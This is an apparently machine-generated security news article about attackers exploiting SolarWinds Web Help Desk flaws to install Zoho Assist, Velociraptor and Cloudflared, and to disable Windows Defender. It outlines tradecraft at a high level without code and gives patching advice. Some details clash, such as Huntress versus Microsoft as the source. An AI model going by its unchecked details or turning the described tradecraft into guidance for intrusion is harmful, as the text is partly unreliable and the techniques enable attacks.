Ethical Hacking News
Hackers are exploiting SolarWinds Web Help Desk (WHD) vulnerabilities to deploy legitimate tools for malicious purposes. The attack leverages recently disclosed CVE-2025-40551 and CVE-2025-26399 flaws, with threat actors utilizing Zoho ManageEngine Assist agent and Velociraptor as part of their campaign. This report delves into the details of this sophisticated attack vector and its implications for system administrators. Learn more about how to mitigate the impact of this vulnerability and stay ahead in the fight against cyber threats.
Hackers are exploiting vulnerabilities in SolarWinds Web Help Desk (WHD) solution to deploy malicious tools. The attackers used recently disclosed flaws in WHD, including CVE-2025-40551 and CVE-2025-26399, to gain remote code execution on host machines without authentication. The attack chain involves using a malicious MSI file to install the Zoho ManageEngine Assist agent and Velociraptor command-and-control framework. The threat actors also use Cloudflared as a secondary tunnel-based access channel and disable Windows Defender and Firewall via registry modifications. System administrators are advised to upgrade SolarWinds WHD to version 2026.1 or later, remove public internet access to admin interfaces, and reset all credentials associated with the product.
SolarWinds, a company widely used in the IT industry for its Web Help Desk (WHD) solution, has become the focal point of a malicious campaign that has left organizations reeling. According to recent reports by Huntress Security, hackers are exploiting vulnerabilities in SolarWinds WHD to deploy legitimate tools for nefarious purposes, including the Zoho ManageEngine remote monitoring and management tool. This article aims to delve into the details of this sophisticated attack vector and its implications for system administrators.
The attackers, believed to be part of a campaign that started on January 16, leveraged the recently disclosed SolarWinds WHD flaws, specifically CVE-2025-40551 and CVE-2025-26399, which received critical severity ratings from CISA. These vulnerabilities enable threat actors to achieve remote code execution on host machines without authentication.
The attack chain begins with an initial access phase, where the attacker gains entry into a compromised system via a malicious MSI file fetched from a Catbox file-hosting platform. The tool is then configured for unattended access and registered to a Zoho Assist account tied to an anonymous Proton Mail address.
Once inside, the attacker installs Zoho ManageEngine Assist agent via the aforementioned MSI file, which is used for direct hands-on keyboard activity and Active Directory (AD) reconnaissance. Moreover, Velociraptor, a legitimate digital forensics and incident response tool, is deployed as a command-and-control framework that communicates with attackers via Cloudflare Workers. Velociraptor, in this case, was utilized in an outdated version of 0.73.4, which contains a privilege escalation flaw that allows the increasing of permissions on the host.
The threat actor also leverages Cloudflared from Cloudflare's official GitHub repository as a secondary tunnel-based access channel for C2 redundancy. In some instances, persistence is achieved via scheduled tasks (TPMProfiler) that open an SSH backdoor via QEMU.
Furthermore, the attackers disable Windows Defender and Firewall via registry modifications to prevent fetching additional payloads from being blocked. The threat actor proceeds by downloading a fresh copy of VS Code approximately a second after disabling Defender.
The attack highlights the potential for sophisticated actors to utilize known vulnerabilities in legitimate tools to achieve their objectives. System administrators are advised to upgrade SolarWinds WHD to version 2026.1 or later, remove public internet access to SolarWinds WHD admin interfaces, and reset all credentials associated with the product.
Huntress also shared Sigma rules and indicators of compromise to help detect Zoho Assist, Velociraptor, Cloudflared, and VS Code tunnel activity, silent MSI installations, and encoded PowerShell execution.
Despite Microsoft not attributing the observed attacks to any specific threat group, and nothing about the targets being disclosed beyond characterizing them as "high-value assets," this attack serves as a stark reminder of the importance of keeping software up-to-date and being vigilant against potential vulnerabilities in widely used tools.
The future of IT infrastructure is one where manual workflows are increasingly overtaken by automation. However, this does not mean that security becomes any less important. The recent SolarWinds WHD flaw highlights the need for system administrators to be aware of potential threats and take proactive measures to protect their systems.
In light of these developments, it has become imperative to implement comprehensive security strategies that cater to the evolving landscape of IT vulnerabilities.
Related Information:
https://www.ethicalhackingnews.com/articles/Hackers-Lure-Organizations-into-a-Web-of-Deceit-The-SolarWinds-WHD-Flaw-and-its-Far-Reaching-Consequences-ehn.shtml
https://www.bleepingcomputer.com/news/security/threat-actors-exploit-solarwinds-wdh-flaws-to-deploy-velociraptor/
https://thehackernews.com/2026/02/solarwinds-web-help-desk-exploited-for.html
https://cyberpress.org/exploiting-solarwinds-web-help-desk/
https://nvd.nist.gov/vuln/detail/CVE-2025-40551
https://www.cvedetails.com/cve/CVE-2025-40551/
https://nvd.nist.gov/vuln/detail/CVE-2025-26399
https://www.cvedetails.com/cve/CVE-2025-26399/
Published: Mon Feb 9 17:08:34 2026 by llama3.2 3B Q4_K_M
